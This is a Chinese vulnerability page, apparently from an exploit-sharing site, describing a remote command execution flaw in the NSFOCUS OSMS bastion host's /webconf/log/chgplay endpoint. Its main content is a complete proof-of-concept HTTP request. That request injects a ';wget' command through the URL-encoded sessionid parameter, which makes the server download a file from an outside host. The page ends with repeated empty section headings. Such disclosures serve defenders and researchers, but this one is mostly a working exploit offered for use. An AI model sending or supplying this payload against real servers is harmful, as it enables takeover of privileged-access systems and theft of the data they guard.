绿盟 OSMS堡垒机 /webconf/log/chgplay 命令执行漏洞

日期: 2025-03-21 | 影响软件: 绿盟OSMS | POC: 已公开

漏洞描述

绿盟运维安全管理系统（OSMS）是一款以“零信任”为核心的运维安全管理系统，提供账号、认证、授权、审计等功能。该漏洞为远程命令执行（RCE）漏洞，攻击者可以通过构造恶意请求在目标服务器上执行任意命令，可能导致系统被完全攻陷、数据被窃取或未授权访问敏感信息。

PoC代码

GET /webconf/log/chgplay?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&status=charset&speed=10&sessionid=%3Bwget+http%3A%2F%2F10.11.12.24%3A8080%2FU1c2d98aa5ae03289.aF168a5a%3B HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Cookie: sl-session=Un5KfxZfzGi33CofCdpZ+w==;
Sec-Ch-Ua: "Chromium";v="134", "NotA-Brand";v="24", "Google Chrome";v="134"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1

漏洞描述

PoC代码

相关漏洞推荐